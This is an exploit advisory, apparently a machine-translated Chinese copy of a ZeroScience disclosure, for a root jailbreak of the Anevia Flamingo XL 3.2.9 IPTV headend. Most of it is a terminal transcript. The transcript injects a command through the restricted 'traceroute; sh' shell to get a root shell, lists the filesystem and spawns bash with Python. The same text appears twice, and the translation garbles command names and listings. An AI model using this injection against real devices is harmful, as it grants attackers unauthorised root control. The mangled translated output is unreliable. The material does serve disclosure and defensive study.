利用标题: Anevia Flamingo XL 3.2.9-远程根越狱
利用作者:液态虫
产品网页: https://www.ateme.com
受影响的版本: 3.2.9
硬件修订1.0
肥皂2.0.3
Summary: Flamingo XL,一种新的模块化和高密度IPTV头端
酒店和公司市场的产品。火烈鸟XL捕获
卫星,有线,数字地面的直播电视和广播内容
和模拟源在通过IP网络将其流式传输到STB之前,PC
或其他IP连接的设备。火烈鸟XL基于模块
4U机架硬件平台允许酒店和公司视频
服务提供商可以从各种来源提供多种渠道
超越内部IP网络。
DESC:管理员建立安全的外壳会话后,她就会得到
使用登录二进制掉入沙盒环境中
允许特定的命令集。那些可以是的命令之一
被剥削以逃脱被判入狱的外壳是示威者。远程攻击者
可以突破受限环境并具有完整的根源访问
到设备。
在: GNU/Linux 3.1.4(x86_64)测试
Apache/2.2.15(UNIX)
mod_ssl/2.2.15
OpenSSL/0.9.8G
DAV/2
PHP/5.3.6
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5780
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5780.php
13.04.2023
- -
$ ssh -o kexalgorithms=+diffie-hellman-group1-sha1 [email protected]
主机的真实性'192.168.1.1(192.168.1.1)'无法建立。
RSA密钥指纹为SHA256:E6TADYKSZZMBS5553THYEPVZV1DPZYRWJZWZW1TM4+ZSLK。
您确定要继续连接(是/否/[指纹])?是的
警告:永久将“ 192.168.1.1”(RSA)添加到已知宿主的列表中。
Anevia Flamingo XL
[email protected]'s密码:
主要XL帮助
可用命令:
结合
config
日期
DNS
使能够
Ethconfig
出口
经验
防火墙
帮助
主机名
http
IGMPQ
小鬼
ipconfig
执照
日志
邮件
Passwd
persistent_logs
ping
重新启动
重置
路线
系列
设置
sslconfig
tcpdump
时区
Traceroute
升级
正常运行时间
版本
Vlanconfig
主XL TCPDUMP; ID
TCPDUMP:非法Token:
主XL ID
未知命令ID
primary-xl whoami
未知的命令whoami
primary-xl ping; id
ping: id:主机名查找失败
主-XL traceroute; id
Busybox v1.1.2p2(2012.04.24-09:33+0000)多呼叫二进制
USAGE: traceroute [-fildnrv] [-f 1st_ttl] [-m max_ttl] [-p端口#] [-Q nqueries]
[-s src_addr] [-t tos] [-w等待] [-g网关] [-i iface]
[-Z pausemsecs]主机[数据大小]
跟踪路由IP数据包关注到“主机”
Options:
-f设置不碎片
- 我使用ICMP Echo代替UDP数据报
-l显示返回数据包的TTL值
-d设置so_debug选项到套接字
-n打印跳跃在数值上寻址而不是象征
-r绕过普通路由表并直接发送到主机
-v详细输出
-m max_ttl设置最大时间到生命的时间(最大啤酒花数)
-p端口#设置探针中使用的基本UDP端口号
(默认为33434)
-q nqueries将每个``ttl''的探针数设置为nqueries
(默认为3)
-s src_addr使用以下IP地址作为源地址
-t tos将探针数据包中的服务类型设置为以下值
(默认为0)
-w等待设置时间(以秒为单位)等待对探针的响应
(默认3秒)
-g指定松动的源路由网关(最大8)
uid=0(root)gid=0(root)组=0(root)
主XL版本
软件修订版: Anevia Flamingo XL v3.2.9
硬件修订版: 1.0
(c)Anevia 2003-2012
primy-xl traceroute; sh
.
.
哇
根
ID
uid=0(root)gid=0(root)组=0(root)
ls -al
DRWXR-XR-X 19根根1024年1024年10月3日。
drwxr-xr-x 19根根1024 1024年1022年3月3日。
drwxr-xr-x 2根根1024年1024年10月21日bin
drwxrwxrwt 2 root root 40 10月3日2022核心
drwxr-xr-x 13根根27648 5月22日00:53开发
drwxr-xr-x 3根根1024年1024年10月21日emul
drwxr-xr-x 48 1000 1000 3072年10月3日2022等
drwxr-xr-x 3根根1024年10月3日2022家庭
drwxr-xr-x 11根3072年10月21日2013年lib
lrwxrwxrwx 1 root root 20 2013年10月21日lib32-/emul/ia32 -linux/lib
lrwxrwxrwx 1 root root 2013年10月21日lib64 -lib
drwx ------ 2根根12288年10月21日2013年丢失+找到
drwxr-xr-x 4根根1024年1024年10月21日mnt
drwxrwxrwt 2 root根80 5月22日22 00:45 php_sessions
DR-XR-XR-X 177根根0月3日3 2022 PROC PROC
drwxr-xr-x 4根根1024年1024年10月21日根
drwxr-xr-x 2根2048年10月21日2013年SBIN
drwxr-xr-x 12根根0月3日3 2022 sys
drwxrwxrwt 26根根1140年5月22 01:06 TMP
DRWXR-XR-X 10 1000 1000 1024 1024年10月21日USR
drwxr-xr-x 14根根1024年1024年10月21日var
LS/var/www/admin
_img configuration.php log_securemedia.php stream_dump.php
_lang cores_and_logs_management.php login.php stream_services
_lib dataminer_handshake.php logout.php streaming.php
_style dvbt.php logs.php support.php
about.php dvbt_scan.php main.php模板
ajax export.php manager.php time.php
alarm.php fileprogress.php network.php toto.ts
alarm_view.php firewall.php pearl upload_helper.php
authentication.php get_config power.php uptime.php
bridges.php get_enquiry_pending.php read_settings.php usbloader.php
cam.php get_upgrade_error.php recepre_helper.php version.php
channel.php heartbeat.php rescrambling webradio.php
channel_xl_list.php包括rescrambling.php webTV
check_state input.php弹性webTV.php
js resilience.php xmltv.php
common License.php restart_service.php
config_snmp.php log.php set_oem.php
Python -C'进口pty; pty.spawn('/bin/bash')''
root@primary-xl:/#cd/usr/local/bin
root@primary -xl:/usr/local/bin#ls -al登录
-rwxr-xr-x 1根35896 2012年2月21日登录
root@primary-xl:/usr/local/bin#cd .
root@primary-xl:/usr/local#ls命令/
结合防火墙邮件时区
配置帮助PassWD Traceroute
日期主机名persistent_logs升级
dbg serial http ping正常运行时间
DBG-SET-OEM IGMPQ路线版本
dbg-uptates-log serial serial vlanconfig
DNS IPCONFIG设置
EthConfig许可证SSLCONFIG
EXP LOG TCPDUMP
root@primary-xl:/usr/local#exit
出口
primary-xl启用
密码:
主XL#;]
利用作者:液态虫
产品网页: https://www.ateme.com
受影响的版本: 3.2.9
硬件修订1.0
肥皂2.0.3
Summary: Flamingo XL,一种新的模块化和高密度IPTV头端
酒店和公司市场的产品。火烈鸟XL捕获
卫星,有线,数字地面的直播电视和广播内容
和模拟源在通过IP网络将其流式传输到STB之前,PC
或其他IP连接的设备。火烈鸟XL基于模块
4U机架硬件平台允许酒店和公司视频
服务提供商可以从各种来源提供多种渠道
超越内部IP网络。
DESC:管理员建立安全的外壳会话后,她就会得到
使用登录二进制掉入沙盒环境中
允许特定的命令集。那些可以是的命令之一
被剥削以逃脱被判入狱的外壳是示威者。远程攻击者
可以突破受限环境并具有完整的根源访问
到设备。
在: GNU/Linux 3.1.4(x86_64)测试
Apache/2.2.15(UNIX)
mod_ssl/2.2.15
OpenSSL/0.9.8G
DAV/2
PHP/5.3.6
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5780
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5780.php
13.04.2023
- -
$ ssh -o kexalgorithms=+diffie-hellman-group1-sha1 [email protected]
主机的真实性'192.168.1.1(192.168.1.1)'无法建立。
RSA密钥指纹为SHA256:E6TADYKSZZMBS5553THYEPVZV1DPZYRWJZWZW1TM4+ZSLK。
您确定要继续连接(是/否/[指纹])?是的
警告:永久将“ 192.168.1.1”(RSA)添加到已知宿主的列表中。
Anevia Flamingo XL
[email protected]'s密码:
主要XL帮助
可用命令:
结合
config
日期
DNS
使能够
Ethconfig
出口
经验
防火墙
帮助
主机名
http
IGMPQ
小鬼
ipconfig
执照
日志
邮件
Passwd
persistent_logs
ping
重新启动
重置
路线
系列
设置
sslconfig
tcpdump
时区
Traceroute
升级
正常运行时间
版本
Vlanconfig
主XL TCPDUMP; ID
TCPDUMP:非法Token:
主XL ID
未知命令ID
primary-xl whoami
未知的命令whoami
primary-xl ping; id
ping: id:主机名查找失败
主-XL traceroute; id
Busybox v1.1.2p2(2012.04.24-09:33+0000)多呼叫二进制
USAGE: traceroute [-fildnrv] [-f 1st_ttl] [-m max_ttl] [-p端口#] [-Q nqueries]
[-s src_addr] [-t tos] [-w等待] [-g网关] [-i iface]
[-Z pausemsecs]主机[数据大小]
跟踪路由IP数据包关注到“主机”
Options:
-f设置不碎片
- 我使用ICMP Echo代替UDP数据报
-l显示返回数据包的TTL值
-d设置so_debug选项到套接字
-n打印跳跃在数值上寻址而不是象征
-r绕过普通路由表并直接发送到主机
-v详细输出
-m max_ttl设置最大时间到生命的时间(最大啤酒花数)
-p端口#设置探针中使用的基本UDP端口号
(默认为33434)
-q nqueries将每个``ttl''的探针数设置为nqueries
(默认为3)
-s src_addr使用以下IP地址作为源地址
-t tos将探针数据包中的服务类型设置为以下值
(默认为0)
-w等待设置时间(以秒为单位)等待对探针的响应
(默认3秒)
-g指定松动的源路由网关(最大8)
uid=0(root)gid=0(root)组=0(root)
主XL版本
软件修订版: Anevia Flamingo XL v3.2.9
硬件修订版: 1.0
(c)Anevia 2003-2012
primy-xl traceroute; sh
.
.
哇
根
ID
uid=0(root)gid=0(root)组=0(root)
ls -al
DRWXR-XR-X 19根根1024年1024年10月3日。
drwxr-xr-x 19根根1024 1024年1022年3月3日。
drwxr-xr-x 2根根1024年1024年10月21日bin
drwxrwxrwt 2 root root 40 10月3日2022核心
drwxr-xr-x 13根根27648 5月22日00:53开发
drwxr-xr-x 3根根1024年1024年10月21日emul
drwxr-xr-x 48 1000 1000 3072年10月3日2022等
drwxr-xr-x 3根根1024年10月3日2022家庭
drwxr-xr-x 11根3072年10月21日2013年lib
lrwxrwxrwx 1 root root 20 2013年10月21日lib32-/emul/ia32 -linux/lib
lrwxrwxrwx 1 root root 2013年10月21日lib64 -lib
drwx ------ 2根根12288年10月21日2013年丢失+找到
drwxr-xr-x 4根根1024年1024年10月21日mnt
drwxrwxrwt 2 root根80 5月22日22 00:45 php_sessions
DR-XR-XR-X 177根根0月3日3 2022 PROC PROC
drwxr-xr-x 4根根1024年1024年10月21日根
drwxr-xr-x 2根2048年10月21日2013年SBIN
drwxr-xr-x 12根根0月3日3 2022 sys
drwxrwxrwt 26根根1140年5月22 01:06 TMP
DRWXR-XR-X 10 1000 1000 1024 1024年10月21日USR
drwxr-xr-x 14根根1024年1024年10月21日var
LS/var/www/admin
_img configuration.php log_securemedia.php stream_dump.php
_lang cores_and_logs_management.php login.php stream_services
_lib dataminer_handshake.php logout.php streaming.php
_style dvbt.php logs.php support.php
about.php dvbt_scan.php main.php模板
ajax export.php manager.php time.php
alarm.php fileprogress.php network.php toto.ts
alarm_view.php firewall.php pearl upload_helper.php
authentication.php get_config power.php uptime.php
bridges.php get_enquiry_pending.php read_settings.php usbloader.php
cam.php get_upgrade_error.php recepre_helper.php version.php
channel.php heartbeat.php rescrambling webradio.php
channel_xl_list.php包括rescrambling.php webTV
check_state input.php弹性webTV.php
js resilience.php xmltv.php
common License.php restart_service.php
config_snmp.php log.php set_oem.php
Python -C'进口pty; pty.spawn('/bin/bash')''
root@primary-xl:/#cd/usr/local/bin
root@primary -xl:/usr/local/bin#ls -al登录
-rwxr-xr-x 1根35896 2012年2月21日登录
root@primary-xl:/usr/local/bin#cd .
root@primary-xl:/usr/local#ls命令/
结合防火墙邮件时区
配置帮助PassWD Traceroute
日期主机名persistent_logs升级
dbg serial http ping正常运行时间
DBG-SET-OEM IGMPQ路线版本
dbg-uptates-log serial serial vlanconfig
DNS IPCONFIG设置
EthConfig许可证SSLCONFIG
EXP LOG TCPDUMP
root@primary-xl:/usr/local#exit
出口
primary-xl启用
密码:
主XL#;]